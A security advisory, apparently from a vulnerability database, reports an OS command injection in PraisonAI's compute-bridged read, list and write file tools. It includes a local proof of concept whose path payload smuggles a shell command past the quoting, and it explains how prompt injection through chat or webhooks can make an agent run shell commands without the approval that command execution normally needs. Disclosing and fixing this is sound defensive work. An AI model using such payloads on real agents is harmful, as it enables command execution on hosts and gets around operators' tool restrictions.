PT-2026-53151 · Pypi · Praisonai

Publicado

2026-06-18

·

Atualizado

2026-06-18

CVSS v3.1

8.8

Alta

VetorAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Compute-bridged file tools allow shell command injection

Summary

LocalManagedAgent / SandboxedAgent compute bridging wraps read file, list files, and write file when a compute provider is attached. The bridge converts those file operations into shell command strings using raw path arguments, then sends those strings to shell-backed compute providers.
An attacker who can influence a file-tool path argument can break out of the quoted path and execute arbitrary shell commands in the compute environment. With compute="local", commands execute through the local subprocess compute provider on the host. With Docker, commands execute in the container.

Affected Product

  • Repository: MervinPraison/PraisonAI
  • Package: praisonai
  • Component: src/praisonai/praisonai/integrations/managed local.py
  • Confirmed affected:
  • v4.6.10
  • v4.6.56
  • v4.6.57
  • current main at 2f9677abb2ea68eab864ee8b6a828fd0141612e1
  • Confirmed not affected:
  • v4.6.9
  • v4.6.1
  • v4.5.149
  • Suggested affected range: >= 4.6.10, <= 4.6.57

Root Cause

Current managed local.py defines the bridged tool set:
python
compute bridged tools = {"execute command", "read file", "write file", "list files"}
For file tools, bridge file tool() constructs shell command strings:
python
command = f'cat "{filepath}"'
command = f'ls -la "{directory}"'
command = f'cat > "{filepath}" << "EOF"
{content}
EOF'
The local compute provider executes the string with asyncio.create subprocess shell(...); the Docker compute provider executes it with ["sh", "-c", command].
The bridge keeps the low-risk read file / list files tool names and signatures while changing their execution primitive into shell interpretation.

Why This Is Not Intended Behavior

Compute bridging itself is documented and intentional. The vulnerability is that file path data is interpreted as shell syntax.
The normal read file and list files implementations treat the same payload as a literal path and do not expand shell metacharacters. The approval registry also marks execute command as critical, while read file and list files are not dangerous-tool entries.

Impact

An application that exposes a PraisonAI agent using LocalManagedAgent or SandboxedAgent with a compute provider and a restricted file-tool set can be tricked into executing shell commands through a path argument to read file or list files.
This can bypass least-privilege tool configuration and tool-approval expectations. A prompt-injection path, chat endpoint, automation webhook, or other user-controlled agent task can supply the file path argument without the operator granting execute command.

Local PoV

The PoV is local-only and harmless. It uses an environment canary and compares normal file tools against compute-bridged file tools.
Minimal inline reproducer:
python
import os
from pathlib import Path

from praisonai.integrations.managed local import LocalManagedAgent, LocalManagedConfig
from praisonaiagents.tools import list files, read file

workdir = Path(".prai-cand-006-pov-workdir")
workdir.mkdir(exist ok=True)
(workdir / "safe.txt").write text("SAFE CONTENT
", encoding="utf-8")

canary = "PRAISONAI CAND 006 COMMAND EXECUTED"
os.environ["PRAI CAND 006 CANARY"] = canary
payload = 'missing"; printf "$PRAI CAND 006 CANARY"; #'

# Control: normal file tools treat the payload as a literal path.
normal read = read file(str(workdir / payload))
normal list = str(list files(str(workdir) + '"; printf "$PRAI CAND 006 CANARY"; #'))

cfg = LocalManagedConfig(
  name="prai-cand-006-poc",
  tools=["read file", "list files"],
  working dir=str(workdir),
)
managed = LocalManagedAgent(config=cfg, compute="local")
tools = {tool. name : tool for tool in managed. resolve tools()}

bridged read = tools["read file"](payload)
bridged list = tools["list files"]('."; printf "$PRAI CAND 006 CANARY"; #')

print("normal read contains canary", canary in normal read)
print("normal list contains canary", canary in normal list)
print("bridged read contains canary", canary in bridged read)
print("bridged list contains canary", canary in bridged list)
Command:
bash
python3 
 submission-bundle/praisonai-prai-cand-006-compute-file-tool-command-injection/poc/prai cand 006 compute file tool command injection.py 
 --repo artifacts/repos/praisonai-current
Current-head result:
json
{
 "describe": "v4.6.57-4-g2f9677ab",
 "vulnerable": true,
 "normal controls": {
  "read file payload contains canary": false,
  "list files payload contains canary": false
 },
 "bridged results": {
  "read file payload contains canary": true,
  "list files payload contains canary": true
 },
 "approval registry": {
  "execute command risk": "critical",
  "read file risk": null,
  "list files risk": null
 }
}
The payload used by the PoV is:
text
missing"; printf "$PRAI CAND 006 CANARY"; #
Normal read file treats this as a literal missing filename. The bridged tool constructs:
sh
cat "missing"; printf "$PRAI CAND 006 CANARY"; #"
and returns the canary from the compute shell.

Suggested Fix

Do not implement file operations by constructing shell command strings from path/content arguments.
Preferred fix:
  1. Add provider-native file APIs for read, write, and list operations, or pass arguments as structured argv where the provider supports it.
  2. Preserve the normal file-tool path validation and workspace boundary checks for compute-bridged file tools.
  3. Treat write file content as data, not shell source. The current heredoc construction is also unsafe if content can contain the delimiter.
  4. Add regression tests that use paths containing ", ;, $(), backticks, newline, and # and assert no shell execution occurs.
  5. Keep execute command as the only bridge path that intentionally accepts a shell command string, with critical approval semantics.
A minimal stopgap is to remove read file, list files, and write file from compute bridged tools until safe provider-native file operations exist.

Suggested Severity

The vector assumes an attacker has low-privilege access to an agent interface that can request file-tool use. If a deployment exposes such an agent without authentication, PR:N may be appropriate.

Correção

Incorrect Authorization

OS Command Injection

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Enumeração de Fraquezas

Identificadores relacionados

GHSA-W6H2-FR4Q-XVXV

Produtos afetados

Praisonai